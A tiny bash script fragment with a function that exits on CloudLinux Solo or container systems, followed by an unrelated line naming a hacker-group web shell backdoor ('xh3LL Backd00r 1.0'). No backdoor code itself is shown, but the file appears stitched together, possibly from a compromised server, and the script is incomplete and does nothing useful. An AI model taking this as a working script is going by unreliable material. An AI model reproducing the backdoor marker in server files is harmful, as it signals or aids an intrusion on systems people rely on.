#!/usr/bin/bash
function skip_on_cl_solo() {
# Check that this is CLS and skip if yes
if [ -f "/etc/cloudlinux-edition-solo" ] || [ -f "/etc/cloudlinux-container" ]; then
exit 0
fi
}
Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat